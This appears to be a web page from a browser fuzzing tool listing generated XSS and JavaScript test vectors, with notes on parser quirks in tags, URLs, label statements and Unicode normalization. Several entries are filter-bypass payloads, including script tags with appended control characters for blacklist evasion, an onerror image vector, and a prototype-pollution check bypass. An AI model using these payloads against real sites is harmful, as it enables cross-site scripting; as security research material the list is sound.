Cheat Sheet
Generated payloads from fuzz test results. Filter by type, category, or browser.
Found 174 vectors with results
<img src0x09=data:text/plain, id="testImg">Shows characters that are allowed between src and = in an img tag.
<img src0x0C=data:text/plain, id="testImg">Shows characters that are allowed between src and = in an img tag.
<img src0x0D=data:text/plain, id="testImg">Shows characters that are allowed between src and = in an img tag.
<div style="color:red">test</div>document.body.innerHTML = String.fromCodePoint(60) + "img src=x onerror=alert(60) />";$:alert(36)This vector shows what characters are allowed to be used to define a label statement. https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/label
_:alert(95)This vector shows what characters are allowed to be used to define a label statement. https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/label
ª:alert(170)This vector shows what characters are allowed to be used to define a label statement. https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/label
µ:alert(181)This vector shows what characters are allowed to be used to define a label statement. https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/label
0 > 0x7f && normalizationForms.forEach(form => {0x0D
const normalized = String.fromCodePoint(0).normalize(form);0x0D
for(let charToCheck of charsToCheck) {0x0D
if(charToCheck === normalized) {0x0D
alert(String.fromCodePoint(0)+"("+form+")"+"="+charToCheck);0x0D
}0x0D
}0x0D
})This vector performs normalization and compares to see if the characters get normalized into path traversal characters
A JS vector that shows what characters are allowed in-between operators.
A JS vector that shows what characters are allowed in-between operators.
A JS vector that shows what characters are allowed in-between operators.
A JS vector that shows what characters are allowed in-between operators.
s = "0";0x0D
if (typeof s["0x00__proto__"] != "undefined") {0x0D
alert(fromCodePoint(0));0x0D
}Some applications protect against prototype pollution by matching the string "__proto__". We can bypass that.
anchor.href='//example.com';0x0D
let chr = String.fromCodePoint(33);0x0D
anchor.hash = chr;0x0D
if(anchor.hash.slice(1).includes(chr))alert(33)This vector shows which unencoded characters are allowed in the hash
anchor.href='//example.com';0x0D
let chr = String.fromCodePoint(36);0x0D
anchor.hash = chr;0x0D
if(anchor.hash.slice(1).includes(chr))alert(36)This vector shows which unencoded characters are allowed in the hash
anchor.href='//example.com';0x0D
let chr = String.fromCodePoint(37);0x0D
anchor.hash = chr;0x0D
if(anchor.hash.slice(1).includes(chr))alert(37)This vector shows which unencoded characters are allowed in the hash
anchor.href='//example.com';0x0D
let chr = String.fromCodePoint(38);0x0D
anchor.hash = chr;0x0D
if(anchor.hash.slice(1).includes(chr))alert(38)This vector shows which unencoded characters are allowed in the hash
anchor.href='//example.com';0x0D
let chr = String.fromCodePoint(39);0x0D
anchor.hash = chr;0x0D
if(anchor.hash.slice(1).includes(chr))alert(39)This vector shows which unencoded characters are allowed in the hash
<a href="0x01//example2.com" id=x></a>This is an example how you can use the XSS type to fuzz URLs. This one fuzzes characters before double slashes. It uses a base tag to get round the sandboxed iframe problems.
<a href="0x02//example2.com" id=x></a>This is an example how you can use the XSS type to fuzz URLs. This one fuzzes characters before double slashes. It uses a base tag to get round the sandboxed iframe problems.
<a href="0x03//example2.com" id=x></a>This is an example how you can use the XSS type to fuzz URLs. This one fuzzes characters before double slashes. It uses a base tag to get round the sandboxed iframe problems.
<a href="0x04//example2.com" id=x></a>This is an example how you can use the XSS type to fuzz URLs. This one fuzzes characters before double slashes. It uses a base tag to get round the sandboxed iframe problems.
<a href="0x05//example2.com" id=x></a>This is an example how you can use the XSS type to fuzz URLs. This one fuzzes characters before double slashes. It uses a base tag to get round the sandboxed iframe problems.
try{0x0D
encodeURIComponent(String.fromCodePoint(55296))0x0D
} catch {0x0D
alert(55296);0x0D
} This vector demonstrates which characters cause encodeURIComponent to throw an exception when attempting to URL encode.
try{0x0D
encodeURIComponent(String.fromCodePoint(55297))0x0D
} catch {0x0D
alert(55297);0x0D
} This vector demonstrates which characters cause encodeURIComponent to throw an exception when attempting to URL encode.
try{0x0D
encodeURIComponent(String.fromCodePoint(55298))0x0D
} catch {0x0D
alert(55298);0x0D
} This vector demonstrates which characters cause encodeURIComponent to throw an exception when attempting to URL encode.
try{0x0D
encodeURIComponent(String.fromCodePoint(55299))0x0D
} catch {0x0D
alert(55299);0x0D
} This vector demonstrates which characters cause encodeURIComponent to throw an exception when attempting to URL encode.
try{0x0D
encodeURIComponent(String.fromCodePoint(55300))0x0D
} catch {0x0D
alert(55300);0x0D
} This vector demonstrates which characters cause encodeURIComponent to throw an exception when attempting to URL encode.
anchor.href='//example.com';0x0D
anchor.username = String.fromCodePoint(33);0x0D
if(!/%/.test(anchor+''))alert(33)This vector shows which characters are not encoded in the credentials part of the URL.
anchor.href='//example.com';0x0D
anchor.username = String.fromCodePoint(36);0x0D
if(!/%/.test(anchor+''))alert(36)This vector shows which characters are not encoded in the credentials part of the URL.
anchor.href='//example.com';0x0D
anchor.username = String.fromCodePoint(38);0x0D
if(!/%/.test(anchor+''))alert(38)This vector shows which characters are not encoded in the credentials part of the URL.
anchor.href='//example.com';0x0D
anchor.username = String.fromCodePoint(40);0x0D
if(!/%/.test(anchor+''))alert(40)This vector shows which characters are not encoded in the credentials part of the URL.
anchor.href='//example.com';0x0D
anchor.username = String.fromCodePoint(41);0x0D
if(!/%/.test(anchor+''))alert(41)This vector shows which characters are not encoded in the credentials part of the URL.
anchor.href='http://example.com';0x0D
anchor.protocol = 'http' + String.fromCodePoint(83) + ':';0x0D
if(!/http:/.test(anchor.protocol+''))alert(83)This vector shows which characters are not encoded in the schema part of the URL.
anchor.href='http://example.com';0x0D
anchor.protocol = 'http' + String.fromCodePoint(115) + ':';0x0D
if(!/http:/.test(anchor.protocol+''))alert(115)This vector shows which characters are not encoded in the schema part of the URL.
anchor.href='//example.com';0x0D
anchor.username = encodeURIComponent(String.fromCodePoint(33));0x0D
if(!/%/.test(anchor+''))alert(33)This vector shows which characters that are URL decoded in the credentials part
anchor.href='//example.com';0x0D
anchor.username = encodeURIComponent(String.fromCodePoint(39));0x0D
if(!/%/.test(anchor+''))alert(39)This vector shows which characters that are URL decoded in the credentials part
anchor.href='//example.com';0x0D
anchor.username = encodeURIComponent(String.fromCodePoint(40));0x0D
if(!/%/.test(anchor+''))alert(40)This vector shows which characters that are URL decoded in the credentials part
anchor.href='//example.com';0x0D
anchor.username = encodeURIComponent(String.fromCodePoint(41));0x0D
if(!/%/.test(anchor+''))alert(41)This vector shows which characters that are URL decoded in the credentials part
This XSS vector shows what characters can be used instead of equal sign on attribute
const x⟦09⟧="x"0x0D
if(x==="x"){alert(9)}This vector shows what characters are allowed and get ignored between the variable name and the equals(=) character.
const x
="x"0x0D
if(x==="x"){alert(10)}This vector shows what characters are allowed and get ignored between the variable name and the equals(=) character.
const x0x0B="x"0x0D
if(x==="x"){alert(11)}This vector shows what characters are allowed and get ignored between the variable name and the equals(=) character.
const x0x0C="x"0x0D
if(x==="x"){alert(12)}This vector shows what characters are allowed and get ignored between the variable name and the equals(=) character.
const x0x0D="x"0x0D
if(x==="x"){alert(13)}This vector shows what characters are allowed and get ignored between the variable name and the equals(=) character.
This vector shows what characters can be used after equals sign for attributes
This vector shows what characters can be used after equals sign for attributes
This vector shows what characters can be used after equals sign for attributes
This vector shows what characters can be used after equals sign for attributes
This vector shows what characters can be used after equals sign for attributes
<script0x09>alert(9)</script>For tag blacklist bypass, by appending character on the end of tag name
<script
>alert(10)</script><script0x0C>alert(12)</script>For tag blacklist bypass, by appending character on the end of tag name
<script0x0D>alert(13)</script>For tag blacklist bypass, by appending character on the end of tag name
<script >alert(32)</script><a href="/0x09/example2.com" id=x></a>This is an example how you can use the XSS type to fuzz URLs. It uses a base tag to get round the sandboxed iframe problems.
<a href="/
/example2.com" id=x></a>This is an example how you can use the XSS type to fuzz URLs. It uses a base tag to get round the sandboxed iframe problems.
<a href="/0x0D/example2.com" id=x></a>This is an example how you can use the XSS type to fuzz URLs. It uses a base tag to get round the sandboxed iframe problems.
<a href="///example2.com" id=x></a>This is an example how you can use the XSS type to fuzz URLs. It uses a base tag to get round the sandboxed iframe problems.
<a href="/\/example2.com" id=x></a>This is an example how you can use the XSS type to fuzz URLs. It uses a base tag to get round the sandboxed iframe problems.
<a href="https://example2.com" id=x></a>This is an example how you can use the XSS type to fuzz URLs. It uses a base tag to get round the sandboxed iframe problems.
<a href="https:\\example2.com" id=x></a>This is an example how you can use the XSS type to fuzz URLs. It uses a base tag to get round the sandboxed iframe problems.